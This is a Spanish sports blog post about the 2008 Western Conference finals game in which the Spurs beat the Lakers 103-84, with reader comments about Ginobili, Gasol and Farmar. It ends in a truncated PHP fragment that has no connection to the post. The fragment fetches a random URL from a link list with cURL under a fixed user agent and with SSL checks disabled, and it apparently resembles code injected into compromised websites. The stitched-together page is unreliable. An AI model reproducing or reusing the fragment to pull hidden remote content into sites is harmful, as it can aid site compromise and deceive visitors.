Empanadas alternas (Spurs 103 – Lakers 84)

26 de May de 2008 por TheDeerHunter

La llegada al Álamo, como suele suceder, resulta un mal trago para cualquiera. Los Lakers no fueron excepción anoche y, en la línea de lo que viene siendo la eliminatoria, hubo pájara que en esta ocasión les tocó sufrir a ellos.

Se está viendo en ambas finales que los equipos llegan justísimos a esta fase del campeonato, tanto mental como físicamente. Consecuencia de ello han sido los partidos de esta serie. Sin ponernos a analizar el bajón de calidad, en el primero, la inoperancia pasó de Lakers a Spurs a mitad del partido. En el segundo, la torrija la sufrieron exclusivamente Spurs, como anoche Lakers. No se está produciendo a nivel de partido la igualdad que se esperaba, pero sí en la eliminatoria, que se presenta larga y dura.

Anoche, horripilantes Lakers en ataque y en defensa. Kobe, a pesar de lo que indican los números sólo estuvo bien puntualmente, porque estuvo muy poco participativo en los momentos clave del partido. El resto, lamentables, superados por completo por rivales y ambiente.
Gasol está sufriendo muchísimo, entre otras cosas porque le toca bailar con la más fea. En cualquier caso, si hay desgaste, él lo sufrirá más que nadie, porque no tiene relevo en Turiaf, que estas eliminatorias le están viniendo grandes. Mal panorama tiene por delante, con todos los focos sobre él y contra el peor rival posible. Conviene mucho en ese sentido que logren evitar alargar la serie más de la cuenta o de lo contrario el viacrucis puede ser de aupa.

Ginobili entrando a canastaNo obstante, la clave de la paliza que se llevaron anoche al hotel, fue la lección de casta que dió el crack argentino Ginobili. Él mismo se autoinculpó el otro día como principal responsable de la debacle tejana. Independientemente de si fue exagerado, hacen falta un buen par de pelotas, como las que se le presuponen a Manudona, para asumir tanta carga y no ser arrastrado por ella en unos momentos como los que se están viviendo. Ninguna excusa le valen para sí mismo, ni siquiera los problemas físicos que está arrastrando. Todo da igual en estos momentos, porque a estas alturas todo el mundo sufre en mayor o menor medida las inclemencias de tantos partidos acumulados.
Mermado o no, anoche se salió por todos lados. En 10 minutos 19 puntos con acierto casi inmaculado. El tipo de actuaciones que genera un climax de emoción que se propaga entre compañeros y aficionados. Un corto espacio de tiempo en el que sus rivales cayeron inevitablemente derrotados, apenas comenzado el 2º cuarto. Nada podrían hacer para revertirlo.

Los Spurs, como casi todos esperábamos se vuelve a meter de lleno en la pomada. Da lo mismo haber perdido de 30 o de 1, como apuntaron los Lakers el otro día, nada hay hecho hasta que se logra ganar fuera. Mucha tela que cortar todavía…

Comenta

8 comentarios a esta entrada

  1. Gallis dice:
    #1

    Que bueno es Manu cuando se pone a jugar al baloncesto, jojojojo…

    Los Lakers flojos, por lo que respecta a Gasol muy blandito en su defensa sobre Duncan.

    En fin, ya comenté que esperaba tener alguna opción en el cuarto. No sé por que, pero este tercer partido me lo esperaba más o menos así…

    Ah! pongo el dato que ha dado mi socio en el foro. Kobe 117 minutos, 6 tiros libres (con Bowen defendiéndolo)…para querer a los Lakers en la final a toda costa, Stern y compañia lo disimulan muy bien.

      Citar

  2. Viva_Dirk dice:
    #2

    Además Bowen saltando como un resorte y poniendo caras en cada falta que le pitan. Por cierto, parece que hemos recuperado a Farmar.

      Citar

  3. aro_pasado_no_newtoniano dice:
    #3

    Ahí estamos. Haciendose el víctima preventivamente y no comentando nada de Ira Newble. Mira qué tenía razón áquel que decía que los lagos había que haberlos drenado.

      Citar

  4. Red dice:
    #4

    Lo de Farmar es de traca… cualquier otro se hubiera hundido para siempre… empieza a merecerse mi respeto… Gasol, por su parte, o espabila o va a perder mucho de lo que se ha ganado… pongo aqui lo que he escrito en nbadicto’s…

    “Joder, Gasol lleva un par de partidos malos, pero decir que es un Varejao es un crimen…Yo creo que es un tio muy emotivo, y por momentos la épica le está superando, bucle mental, yo que se, pero si uan cosa tiene Gasol es que, rapida o lentamente, siempre va avanzando, y acaba callando muchas bocas… También cuenta el hecho de que, en Lakers, al tenr mucha más ayuda, en realidad se acomoda más en ciertas ocasiones, por eso creo yo que el tirito de 5-6 metros no le está funcionando… Además es la primera vez que llega a éste punto.. o os creéis que en playoffs la experiencia no cuenta… en este momento concreto, Gasol es un novato… pero (punto importante para el futuro) está entrenado por Phil Jackson… dádle tiempo, que aqui no tenemos paciencia… véamos a Gasol en los playoffs del año que vien (o del otro) Me gustaría sobremanera verlo por una cerradura..”

    Viva Ira

      Citar

  5. Viva_Dirk dice:
    #5

    Bueno, es verdad que es la primera vez que llega a estas alturas en play-offs, pero esa excusa para Gasol creo que vale poco, porque aunque en la NBA es la primera vez, ha jugado al mas alto nivel con la selección.

      Citar

  6. Red dice:
    #6

    @ Xapa: Ja ho havia vist ja, merci… el meu mail es pot troabr al perfil de blogger, clickant sobre l’avatar… Ja m’ho miraré ja…

    @ Dirk: Gasol no es un tio precisamente frío, es muy emotivo, una cualidad de doble filo… joder, y está realizando el sueño de cualquiera de nosotros en los jodidos álbumes de cromos… yo también estaría de los nervios a veces jejeje… que es de Sant Boi home!

      Citar

  7. Red dice:
    #7

    Para contar éstas cosas, nadie mejor que Trecet… Espectacular!

      Citar

  8. Red dice:
    #8

    Creo firmemente que Turiaf debería reemplazar a Ira como deidad de éste blog… o eso, o nos volvemos politeístas…

    http://es.youtube.com/watch?v=NtM6litPFSM

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>